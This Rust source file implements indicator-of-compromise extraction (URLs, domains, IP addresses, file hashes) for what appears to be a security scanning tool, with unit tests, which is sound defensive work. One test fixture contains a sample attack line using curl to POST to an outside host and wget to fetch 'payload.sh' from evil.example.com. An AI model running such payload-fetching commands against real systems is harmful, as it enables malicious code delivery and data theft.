1use crate::lazy_pattern;
15use serde::{Deserialize, Serialize};
16use sha2::{Digest, Sha256};
17use std::collections::BTreeSet;
18use std::path::{Path, PathBuf};
19
20lazy_pattern!(URL_PATTERN, r#"https?://[^\s"'<>`\{\}\[\]\(\)\\]{3,512}"#);
21
22lazy_pattern!(
23 IPV4_PATTERN,
24 r"\b(?:(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\b"
25);
26
27lazy_pattern!(
34 IPV6_PATTERN,
35 r"\b(?:(?:[A-Fa-f0-9]{1,4}:){1,7}(?::[A-Fa-f0-9]{1,4}){1,7}|(?:[A-Fa-f0-9]{1,4}:){7}[A-Fa-f0-9]{1,4})\b"
36);
37
38lazy_pattern!(
43 HOST_MENTION_PATTERN,
44 r"\b([a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?)+\.(?:com|net|org|io|dev|ai|fly\.dev|vercel\.app|co|me|xyz|app|cloud|tech|info|biz|pro|us|uk|de|fr|es|it|ru|cn|jp|hk|tw|kr|sg|in|br|mx|ca|au|nz|za|ae|tr|il|ch|nl|be|se|no|fi|dk|pl|ir|pk|sa|eg|th|vn|ph|id|my|ng))\b"
45);
46
47#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
51pub struct ExtractedIocs {
52 pub urls: Vec<String>,
53 pub domains: Vec<String>,
54 pub ipv4: Vec<String>,
55 pub ipv6: Vec<String>,
56 pub file_hashes: Vec<FileHash>,
58}
59
60#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
61pub struct FileHash {
62 pub path: PathBuf,
63 pub sha256: String,
64}
65
66impl ExtractedIocs {
67 pub fn is_empty(&self) -> bool {
68 self.urls.is_empty()
69 && self.domains.is_empty()
70 && self.ipv4.is_empty()
71 && self.ipv6.is_empty()
72 && self.file_hashes.is_empty()
73 }
74
75 pub fn merge(&mut self, other: ExtractedIocs) {
77 fn merge_sorted(target: &mut Vec<String>, additions: Vec<String>) {
78 let mut set: BTreeSet<String> = target.drain(..).collect();
79 set.extend(additions);
80 *target = set.into_iter().collect();
81 }
82 merge_sorted(&mut self.urls, other.urls);
83 merge_sorted(&mut self.domains, other.domains);
84 merge_sorted(&mut self.ipv4, other.ipv4);
85 merge_sorted(&mut self.ipv6, other.ipv6);
86
87 let mut seen: BTreeSet<(PathBuf, String)> = self
88 .file_hashes
89 .drain(..)
90 .map(|h| (h.path, h.sha256))
91 .collect();
92 for h in other.file_hashes {
93 seen.insert((h.path, h.sha256));
94 }
95 self.file_hashes = seen
96 .into_iter()
97 .map(|(path, sha256)| FileHash { path, sha256 })
98 .collect();
99 }
100}
101
102const NOISE_DOMAINS: &[&str] = &[
106 "localhost",
107 "localhost.localdomain",
108 "example.com",
109 "example.org",
110 "example.net",
111 "test.com",
112 "invalid",
113];
114
115const NOISE_IPV4_PREFIXES: &[&str] = &[
116 "127.", "0.0.0.0", "10.", "192.168.", "169.254.", ];
127
128const KEEP_SPECIAL_IPV4: &[&str] = &[
131 "169.254.169.254", ];
133
134pub const MAX_IOCS_PER_KIND_PER_ARTIFACT: usize = 4_096;
143
144pub fn extract_from_artifact(path: &Path, content: &[u8]) -> ExtractedIocs {
148 let mut out = if let Ok(text) = std::str::from_utf8(content) {
149 extract_from_text(text)
150 } else {
151 let lossy = String::from_utf8_lossy(content);
153 extract_from_text(&lossy)
154 };
155 out.file_hashes.push(FileHash {
156 path: path.to_path_buf(),
157 sha256: sha256_hex(content),
158 });
159 out
160}
161
162pub fn extract_from_text(text: &str) -> ExtractedIocs {
170 let mut urls: BTreeSet<String> = BTreeSet::new();
171 let mut domains: BTreeSet<String> = BTreeSet::new();
172 let mut ipv4: BTreeSet<String> = BTreeSet::new();
173 let mut ipv6: BTreeSet<String> = BTreeSet::new();
174
175 fn try_insert_bounded(set: &mut BTreeSet<String>, value: String, kind: &'static str) -> bool {
179 if set.len() >= MAX_IOCS_PER_KIND_PER_ARTIFACT {
180 tracing::warn!(
181 kind,
182 cap = MAX_IOCS_PER_KIND_PER_ARTIFACT,
183 "ioc_extraction: per-artifact IOC cap reached; truncating further matches"
184 );
185 return false;
186 }
187 set.insert(value);
188 true
189 }
190
191 for m in URL_PATTERN.find_matches(text) {
192 let raw = m.matched_text.as_str();
193 let trimmed = raw.trim_end_matches([',', '.', ';', ':', ')', ']', '}', '!', '?']);
194 if !try_insert_bounded(&mut urls, trimmed.to_string(), "url") {
195 break;
196 }
197 if let Some(host) = extract_host_from_url(trimmed) {
198 if !is_noise_domain(&host) && !is_ipv4(&host) && !is_ipv6(&host) {
199 if domains.len() < MAX_IOCS_PER_KIND_PER_ARTIFACT {
203 try_insert_bounded(&mut domains, host, "domain");
204 }
205 }
206 }
207 }
208
209 for m in HOST_MENTION_PATTERN.find_matches(text) {
210 let host = m.matched_text.to_ascii_lowercase();
211 if !is_noise_domain(&host) && !try_insert_bounded(&mut domains, host, "domain") {
212 break;
213 }
214 }
215
216 for m in IPV4_PATTERN.find_matches(text) {
217 let ip = m.matched_text.as_str();
218 if !is_noise_ipv4(ip) && !try_insert_bounded(&mut ipv4, ip.to_string(), "ipv4") {
219 break;
220 }
221 }
222
223 for m in IPV6_PATTERN.find_matches(text) {
224 let ip = m.matched_text;
225 if ip.matches(':').count() >= 2
231 && is_plausible_ipv6(&ip)
232 && !try_insert_bounded(&mut ipv6, ip, "ipv6")
233 {
234 break;
235 }
236 }
237
238 ExtractedIocs {
239 urls: urls.into_iter().collect(),
240 domains: domains.into_iter().collect(),
241 ipv4: ipv4.into_iter().collect(),
242 ipv6: ipv6.into_iter().collect(),
243 file_hashes: Vec::new(),
244 }
245}
246
247fn extract_host_from_url(url: &str) -> Option<String> {
248 let after_scheme = url.split_once("://").map(|(_, rest)| rest)?;
249 let no_userinfo = after_scheme
250 .split_once('@')
251 .map_or(after_scheme, |(_, h)| h);
252 let end = no_userinfo
253 .find(['/', '?', '#'])
254 .unwrap_or(no_userinfo.len());
255 let host_port = &no_userinfo[..end];
256 let host = if host_port.starts_with('[') {
259 host_port
260 .split(']')
261 .next()
262 .map(|s| s.trim_start_matches('['))
263 } else {
264 host_port.split(':').next()
265 };
266 host.map(|h| h.to_ascii_lowercase())
267 .filter(|h| !h.is_empty())
268}
269
270fn is_noise_domain(domain: &str) -> bool {
271 let d = domain.to_ascii_lowercase();
272 NOISE_DOMAINS.iter().any(|n| d == *n)
273}
274
275fn is_noise_ipv4(ip: &str) -> bool {
276 if KEEP_SPECIAL_IPV4.contains(&ip) {
277 return false;
278 }
279 if ip == "0.0.0.0" {
280 return true;
281 }
282 if NOISE_IPV4_PREFIXES
283 .iter()
284 .any(|prefix| ip.starts_with(prefix))
285 {
286 return true;
287 }
288 is_rfc1918_172(ip)
289}
290
291fn is_rfc1918_172(ip: &str) -> bool {
298 let mut parts = ip.split('.');
299 let (Some(a), Some(b)) = (parts.next(), parts.next()) else {
300 return false;
301 };
302 if a != "172" {
303 return false;
304 }
305 matches!(b.parse::<u8>(), Ok(16..=31))
306}
307
308fn is_ipv4(s: &str) -> bool {
309 IPV4_PATTERN.is_match(s) && s.matches('.').count() == 3
310}
311
312fn is_ipv6(s: &str) -> bool {
313 s.matches(':').count() >= 2 && IPV6_PATTERN.is_match(s) && is_plausible_ipv6(s)
314}
315
316fn is_plausible_ipv6(s: &str) -> bool {
323 if s.contains("::") {
324 return true;
325 }
326 let groups: Vec<&str> = s.split(':').collect();
327 groups.len() == 8 && groups.iter().all(|g| !g.is_empty() && g.len() <= 4)
328}
329
330fn sha256_hex(bytes: &[u8]) -> String {
331 let mut hasher = Sha256::new();
332 hasher.update(bytes);
333 format!("{:x}", hasher.finalize())
334}
335
336#[cfg(test)]
337mod tests {
338 use super::*;
339
340 #[test]
349 fn extract_from_text_caps_url_count_per_artifact() {
350 let mut text = String::new();
351 let target = MAX_IOCS_PER_KIND_PER_ARTIFACT + 256;
353 for n in 0..target {
354 use std::fmt::Write;
355 let _ = writeln!(text, "see https://example-{n}.test/ for details");
356 }
357 let iocs = extract_from_text(&text);
358 assert!(
359 iocs.urls.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
360 "URL set must be capped at {}; got {}",
361 MAX_IOCS_PER_KIND_PER_ARTIFACT,
362 iocs.urls.len()
363 );
364 }
365
366 #[test]
367 fn extracts_urls_and_domains_from_script() {
368 let text = "curl -s -X POST http://sphinx.espuny.net:5000/v1/audio ; wget https://evil.example.com/payload.sh";
369 let iocs = extract_from_text(text);
370 assert!(iocs
371 .urls
372 .iter()
373 .any(|u| u.starts_with("http://sphinx.espuny.net:5000")));
374 assert!(iocs
375 .urls
376 .iter()
377 .any(|u| u.starts_with("https://evil.example.com")));
378 assert!(iocs.domains.contains(&"sphinx.espuny.net".to_string()));
379 assert!(iocs.domains.iter().any(|d| d == "evil.example.com"));
381 }
382
383 #[test]
384 fn filters_loopback_and_private_ips() {
385 let text = "target = 127.0.0.1 fallback = 10.0.0.5 router = 192.168.1.1 public = 8.8.8.8 imds = 169.254.169.254";
386 let iocs = extract_from_text(text);
387 assert!(iocs.ipv4.contains(&"8.8.8.8".to_string()));
388 assert!(iocs.ipv4.contains(&"169.254.169.254".to_string())); assert!(!iocs.ipv4.contains(&"127.0.0.1".to_string()));
390 assert!(!iocs.ipv4.contains(&"10.0.0.5".to_string()));
391 assert!(!iocs.ipv4.contains(&"192.168.1.1".to_string()));
392 }
393
394 #[test]
399 fn is_noise_ipv4_covers_full_rfc1918_172_12_block() {
400 for ip in [
401 "172.16.0.1",
402 "172.17.0.1", "172.18.0.42",
404 "172.20.5.5",
405 "172.31.255.255",
406 ] {
407 assert!(
408 is_noise_ipv4(ip),
409 "172.16.0.0/12 must be filtered; failed for {ip}"
410 );
411 }
412 for ip in ["172.15.0.1", "172.32.0.1", "172.0.0.1"] {
413 assert!(
414 !is_noise_ipv4(ip),
415 "{ip} is outside RFC1918 172.16.0.0/12 and must NOT be filtered"
416 );
417 }
418 }
419
420 #[test]
423 fn extract_filters_full_rfc1918_172_12_block_e2e() {
424 let text =
425 "docker = 172.17.0.5 internal = 172.20.1.1 public = 9.9.9.9 edge = 172.32.0.1";
426 let iocs = extract_from_text(text);
427 assert!(!iocs.ipv4.contains(&"172.17.0.5".to_string()));
428 assert!(!iocs.ipv4.contains(&"172.20.1.1".to_string()));
429 assert!(iocs.ipv4.contains(&"9.9.9.9".to_string()));
430 assert!(iocs.ipv4.contains(&"172.32.0.1".to_string()));
431 }
432
433 #[test]
437 fn ipv6_extraction_rejects_unbounded_hex_runs_in_identifiers() {
438 let text = "token=xabc1:abc2:abc3:abc4:abc5:abc6:abc7:abc8x more text";
439 let iocs = extract_from_text(text);
440 assert!(
441 iocs.ipv6.is_empty(),
442 "IPv6 must NOT match inside identifier word characters; got {:?}",
443 iocs.ipv6
444 );
445 }
446
447 #[test]
454 fn ipv6_extraction_rejects_short_hex_token_lacking_double_colon() {
455 let text = "session = abc1:def2:1234:5678 next";
456 let iocs = extract_from_text(text);
457 assert!(
458 iocs.ipv6.is_empty(),
459 "4-group hex-colon token without `::` must NOT extract as IPv6; got {:?}",
460 iocs.ipv6
461 );
462 }
463
464 #[test]
466 fn ipv6_extraction_keeps_valid_addresses() {
467 let text = "endpoint = 2001:db8::dead:beef:1; alt = fe80::1";
468 let iocs = extract_from_text(text);
469 assert!(
470 iocs.ipv6.iter().any(|i| i.contains("2001:db8")),
471 "Valid IPv6 must still match; got {:?}",
472 iocs.ipv6
473 );
474 }
475
476 #[test]
480 fn is_plausible_ipv6_rejects_overlong_groups() {
481 assert!(!is_plausible_ipv6(
483 "aaaaa:bbbb:cccc:dddd:eeee:ffff:1111:2222"
484 ));
485 }
486
487 #[test]
488 fn is_plausible_ipv6_accepts_compressed_form() {
489 assert!(is_plausible_ipv6("2001:db8::1"));
490 assert!(is_plausible_ipv6("fe80::1"));
491 }
492
493 #[test]
494 fn is_plausible_ipv6_accepts_full_8_group_form() {
495 assert!(is_plausible_ipv6("2001:0db8:85a3:0000:0000:8a2e:0370:7334"));
496 }
497
498 #[test]
499 fn hashes_artifact_content() {
500 let iocs = extract_from_artifact(Path::new("script.sh"), b"hello world");
501 assert_eq!(iocs.file_hashes.len(), 1);
502 assert_eq!(
503 iocs.file_hashes[0].sha256,
504 "b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9"
506 );
507 }
508
509 #[test]
510 fn ipv6_basic_extraction() {
511 let text = "endpoint = 2001:db8::dead:beef:1";
512 let iocs = extract_from_text(text);
513 assert!(iocs.ipv6.iter().any(|i| i.contains("2001:db8")));
514 }
515
516 #[test]
517 fn deduplicates_and_sorts() {
518 let text = "https://a.com/x https://a.com/y https://a.com/x 8.8.8.8 8.8.4.4 8.8.8.8";
519 let iocs = extract_from_text(text);
520 assert_eq!(
521 iocs.ipv4,
522 vec!["8.8.4.4".to_string(), "8.8.8.8".to_string()]
523 );
524 assert!(iocs.urls.len() >= 2);
525 }
526
527 #[test]
528 fn merge_combines_disjoint_lists() {
529 let mut a = extract_from_text("https://foo.com/x 1.1.1.1");
530 let b = extract_from_text("https://bar.io/y 8.8.8.8");
531 a.merge(b);
532 assert!(a.domains.contains(&"foo.com".to_string()));
533 assert!(a.domains.contains(&"bar.io".to_string()));
534 assert!(a.ipv4.contains(&"1.1.1.1".to_string()));
535 assert!(a.ipv4.contains(&"8.8.8.8".to_string()));
536 }
537
538 #[test]
539 fn does_not_flag_programming_identifiers_as_domains() {
540 let text = "object.method.name = func.call() # not a host";
541 let iocs = extract_from_text(text);
542 assert!(
543 iocs.domains.is_empty(),
544 "got false-positive: {:?}",
545 iocs.domains
546 );
547 }
548
549 #[test]
558 fn domain_cap_does_not_spam_repeated_warns() {
559 let mut text = String::new();
560 let target = MAX_IOCS_PER_KIND_PER_ARTIFACT + 100;
563 for n in 0..target {
564 use std::fmt::Write;
565 let _ = writeln!(text, "see https://unique-{n}.example.com/");
566 }
567 let iocs = extract_from_text(&text);
568 assert!(
569 iocs.domains.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
570 "domain set must be capped at {}; got {}",
571 MAX_IOCS_PER_KIND_PER_ARTIFACT,
572 iocs.domains.len()
573 );
574 assert!(
576 iocs.urls.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
577 "URL set must also be capped; got {}",
578 iocs.urls.len()
579 );
580 }
581}